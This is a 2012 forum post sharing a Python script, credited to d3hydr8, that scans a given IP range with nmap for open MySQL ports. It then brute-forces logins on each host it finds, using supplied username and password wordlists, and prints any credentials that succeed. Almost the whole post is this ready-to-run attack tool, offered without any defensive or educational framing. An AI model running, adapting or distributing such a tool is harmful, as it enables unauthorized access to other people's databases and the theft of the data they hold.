Eric Posted November 3, 2012 Report Posted November 3, 2012 #!usr/bin/python#MySQL Brute Forcer, searches ip_range for hosts using MySQL.#You need the MySQLdb package found here:#http://sourceforge.net/projects/mysql-python#http://www.darkc0de.com#d3hydr8[at]gmail[dot]comimport threading, time, StringIO, commands, random, sys, refrom copy import copytry: import MySQLdbexcept(ImportError): print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n" sys.exit(1)if len(sys.argv) !=4: print "Usage: ./mysqlbrute_iprange.py <ip_range> <userlist> <wordlist>" sys.exit(1)try: users = open(sys.argv[2], "r").readlines()except(IOError): print "Error: Check your userlist path\n" sys.exit(1)try: words = open(sys.argv[3], "r").readlines()except(IOError): print "Error: Check your wordlist path\n" sys.exit(1)print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"print "\t--------------------------------------------------\n"print "[+] Scanning:",sys.argv[1]print "[+] Users Loaded:",len(users)print "[+] Words Loaded:",len(words)wordlist = copy(words)def scan(): iprange = sys.argv[1] ip_list = [] nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 3306 | grep open -B 3')[1]).readlines() for tmp in nmap: ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) if ipaddr: ip_list.append(ipaddr[0]) return ip_listdef reloader(): for word in wordlist: words.append(word)def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: reloader() value = random.sample(words, 1) lock.release() return value[0][:-1]class Workhorse(threading.Thread): def run(self): value = getword() try: print "-"*12 print "User:",user[:-1],"Password:",value db=MySQLdb.connect(host=ip,user=user,passwd=value) print "\t\nLogin successful:",user, value db.close() work.join() sys.exit(2) except(MySQLdb.Error), msg: #print "An error occurred:", msg passip_list = scan()print "[+] Hosts Loaded:",len(ip_list),"\n"for ip in ip_list: print "\n\tAttempting BruteForce:",ip,"\n" for user in users: for i in range(len(words)): if i == 0: reloader() work = Workhorse() work.start() time.sleep(1) Quote